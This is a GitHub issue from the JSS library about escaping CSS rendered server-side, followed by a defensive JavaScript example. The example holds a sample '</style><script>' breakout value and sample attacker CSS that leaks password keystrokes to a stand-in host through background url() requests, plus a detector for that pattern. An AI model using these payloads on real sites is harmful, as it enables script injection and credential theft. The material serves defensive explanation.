Ensure escaping during SSR #1265
Labels: bug, complexity:high, help wanted, important
Script injection
Expected behavior:
CSS rendered server-side needs HTML escaping by default because of the script injection attack.
Describe the bug:
There is a known security issue with rendering CSS server-side and interpolating user content into it. It's the same issue that has plagued all backend frameworks forever. React is very explicit about it by providing only one way to render unescaped HTML, using dangerouslySetInnerHTML.
In JSS this is also possible, since any end user's value can be used, and if devs (JSS users) don't escape, the attacker can do this:
In the case of JSS this is only possible with SSR, because the techniques we use on the client, style.textContent and sheet.insertRule, don't evaluate HTML.
Codesandbox link:
https://codesandbox.io/s/elated-jepsen-qox0m
Versions (please complete the following information):
Solution:
When we call registry.toString() we can escape closing tags (example implementation). I don't know if we need to escape anything else except the closing </style tag, since this is the only way I can think of how an attacker can inject script. Let me know if there is any other way.
content property or urls of backgrounds, which will result in undesired effects.
CSS injection attack
There is another attack vector with CSS injection, which is discussed here.
The problem is well described by @jamesknelson https://frontarm.com/james-k-nelson/how-can-i-use-css-in-js-securely/
TL;DR: if an attacker is able to inject custom CSS, they can capture keystrokes and send requests using background images; more about it here.
Same issue at styled components
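As an added example (not part of this issue and not JSS's own code), the following JavaScript shows the two halves of the problem described above: the `</style` escape proposed for the output of `registry.toString()`, together with a small model of how the HTML tokenizer decides where a `<style>` element ends, and a triage check for the keystroke-exfiltration pattern from the linked article. Every function name, the `ssr-jss` id, the `attacker.invalid` host and all sample CSS are constructed for this example and assume nothing about JSS internals.

```javascript
// Added example, not JSS's own code. It models the two halves of the issue:
// (1) why "</style" is the one sequence that must be escaped in SSR output,
// and (2) why that escape does nothing against CSS injection itself.
// Function names, the "ssr-jss" id and all sample inputs are constructed here.

// Naive SSR rendering: interpolates the CSS text verbatim into a <style>
// element. This is the vulnerable form the issue describes.
function renderStyleTagUnsafe(css) {
  return `<style id="ssr-jss">${css}</style>`;
}

// Neutralise "</style" (any letter case) by inserting a CSS escape before the
// slash. The HTML tokenizer no longer sees an end tag, while the CSS engine
// decodes "\/" back to "/" inside strings and identifiers, so a quoted
// url("https://example.invalid/</style") keeps its original value.
function escapeStyleClosingTag(css) {
  return String(css).replace(/<\/(style)/gi, '<\\/$1');
}

// Hardened SSR rendering: the only change is the escape step.
function renderStyleTagSafe(css) {
  return `<style id="ssr-jss">${escapeStyleClosingTag(css)}</style>`;
}

// Minimal model of the HTML tokenizer's rule for raw-text elements such as
// <style>: its content ends at the first "</style" followed by whitespace,
// "/" or ">", and nothing else inside it is parsed as HTML. Returns the
// markup that ends up *outside* the element, i.e. what an attacker gets
// parsed as real HTML. Assumes the first "<style" in the input is the
// element under test.
function leakedAfterStyle(html) {
  const open = html.indexOf('<style');
  const start = html.indexOf('>', open) + 1;
  const m = /<\/style[\s/>]/i.exec(html.slice(start));
  if (!m) return '';
  const closeEnd = html.indexOf('>', start + m.index) + 1;
  return html.slice(closeEnd);
}

// Heuristic for the CSS-injection vector the issue links to: an attacker who
// controls whole rules can pair an attribute-substring selector on an <input>
// with a background url() so that each matching keystroke triggers a request.
// Flags rules combining both; it is a triage check for generated CSS, not a
// sanitiser, and it does not descend into nested at-rules.
function findExfiltratingRules(css) {
  const flagged = [];
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selector = m[1].trim();
    const body = m[2];
    if (/\[[^\]]*[\^$*]=/.test(selector) && /url\s*\(/i.test(body)) {
      flagged.push(selector);
    }
  }
  return flagged;
}

// Constructed sample input: a "theme colour" an end user is allowed to set,
// interpolated into a rule without any escaping by the application.
const SAMPLE_USER_VALUE = 'red}</style><script>alert(1)</script>';
const SAMPLE_CSS = `.title { color: ${SAMPLE_USER_VALUE}; }`;

// Constructed sample of attacker-controlled CSS that needs no HTML breakout.
const SAMPLE_ATTACK_CSS = `
input[name="pw"][value^="a"] { background: url(https://attacker.invalid/k?a); }
input[name="pw"][value^="b"] { background: url(https://attacker.invalid/k?b); }
.theme { color: red; }
`;

// Runs both checks over the constructed samples and returns the findings.
function demo() {
  return {
    leakedUnsafe: leakedAfterStyle(renderStyleTagUnsafe(SAMPLE_CSS)),
    leakedSafe: leakedAfterStyle(renderStyleTagSafe(SAMPLE_CSS)),
    exfiltrating: findExfiltratingRules(SAMPLE_ATTACK_CSS),
  };
}

console.log(demo());
```

Run it with `node`. With the unsafe renderer the `<script>` element lands outside the `<style>` element and is parsed as HTML; with the escape in place nothing leaks. The escape only closes the breakout, though: the two `input[...]` rules in the second sample are flagged without any `</style` in them, which is the point of the CSS injection section above. The rule splitter is a plain regex and is meant for triage of generated CSS, not as a replacement for a CSS parser.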